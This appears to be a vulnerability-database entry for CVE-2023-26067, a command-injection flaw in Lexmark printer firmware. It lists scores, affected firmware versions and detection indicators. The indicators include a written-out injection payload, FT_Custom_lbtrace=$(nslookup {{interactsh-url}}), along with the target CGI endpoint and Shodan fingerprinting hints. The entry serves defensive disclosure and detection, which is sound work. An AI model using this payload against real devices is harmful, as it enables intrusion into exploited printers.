cbcvebase.
CVE-2023-26067
published 2023-04-10

CVE-2023-26067: Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).

PriorityP183high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
37.84%
98.4th percentile
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).

Affected

28 ranges· showing 25
VendorProductVersion rangeFixed in
lexmarkcslbl_firmware< cslbl.081.232cslbl.081.232
lexmarkcslbn_firmware< cslbn.081.232cslbn.081.232
lexmarkcsnzj_firmware< csnzj.081.232csnzj.081.232
lexmarkcstat_firmware< cstat.081.233cstat.081.233
lexmarkcstmh_firmware< cstmh.081.233cstmh.081.233
lexmarkcstmh_firmware< cstmx.081.233cstmx.081.233
lexmarkcstpc_firmware< cstpc.081.232cstpc.081.232
lexmarkcxlbl_firmware< cxlbl.081.232cxlbl.081.232
lexmarkcxlbn_firmware< cxlbn.081.232cxlbn.081.232
lexmarkcxnzj_firmware< cxnzj.081.232cxnzj.081.232
lexmarkcxtat_firmware< cxtat.081.233cxtat.081.233
lexmarkcxtmm_firmware< cxtmm.081.232cxtmm.081.232
lexmarkcxtpc_firmware< cxtpc.081.232cxtpc.081.232
lexmarkcxtpp_firmware< cxtpp.081.233cxtpp.081.233
lexmarkcxtpp_firmware< cstpp.081.233cstpp.081.233
lexmarkcxtzj_firmware< cxtzj.081.232cxtzj.081.232
lexmarkmslbd_firmware< mslbd.081.232mslbd.081.232
lexmarkmslsg_firmware< mslsg.081.232mslsg.081.232
lexmarkmsngm_firmware< msngm.081.232msngm.081.232
lexmarkmsngw_firmware< msngw.081.232msngw.081.232
lexmarkmstgw_firmware< mstgw.081.232mstgw.081.232
lexmarkmxlbd_firmware< mxlbd.081.232mxlbd.081.232
lexmarkmxlsg_firmware< mxlsg.081.232mxlsg.081.232
lexmarkmxngm_firmware< mxngm.081.232mxngm.081.232
lexmarkmxtct_firmware< mxtct.081.232mxtct.081.232

Detection & IOCsextracted from sources · hover to see the quote

url/cgi-bin/fax_change_faxtrace_settings
commandFT_Custom_lbtrace=$(nslookup {{interactsh-url}})
otherServer: Lexmark_Web_Server
otherserver: lexmark_web_server
  • Exploit targets HTTP POST to /cgi-bin/fax_change_faxtrace_settings with a command injection payload in the FT_Custom_lbtrace parameter using shell command substitution syntax $(...)
  • Successful exploitation can be confirmed via out-of-band DNS interaction (interactsh/OOB DNS callback) triggered by the injected nslookup command
  • Vulnerable Lexmark devices can be fingerprinted on Shodan using the HTTP Server header 'Lexmark_Web_Server' or 'lexmark_web_server'
  • A successful response to the exploit endpoint returns HTTP 200 and a body containing the string 'Fax Trace Settings'
  • The injection variable used in the payload is cmd set to 'nslookup {{interactsh-url}}', confirming the attack vector is OS command injection via shell substitution in the FAX trace settings CGI handler
  • ·The vulnerability is rated CVSS 8.1 (High) but with High Attack Complexity (AC:H), meaning exploitation may require specific conditions or timing to succeed
  • ·The CVE affects a broad range of Lexmark devices; the CPE wildcard (*) indicates multiple firmware versions are impacted up through 2023-02-19
  • ·This is issue 1 of 4 input validation mishandling CVEs for Lexmark devices; additional related CVEs exist and should be assessed together

CVSS provenance

nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.